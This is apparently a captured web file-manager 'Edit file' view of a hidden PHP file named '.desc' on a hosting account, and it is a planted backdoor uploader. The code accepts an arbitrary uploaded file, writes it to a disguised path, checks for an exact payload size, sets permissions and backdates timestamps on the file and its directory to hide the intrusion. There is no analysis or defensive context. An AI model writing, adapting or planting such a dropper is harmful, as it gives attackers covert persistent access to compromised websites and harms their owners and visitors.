Edit file File name : .desc Content :<?php $p = "/home/oakhrgpw/holyfaithps.co.in//home/oakhrgpw/php/cmpi_popup"; $ft = 1750768276; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) { $filesize = filesize($p); if ($filesize >= 3947) { @chmod($p, 0744); if ($ft) { @touch($p, $ft, $ft); @touch(@dirname($p), $ft, $ft); } die('_uploaded!_'); } else { if (file_exists($p)) { print "file exists but size = {$filesize} not 3947"; } @unlink($p); } } die('_upload_failed_'); Save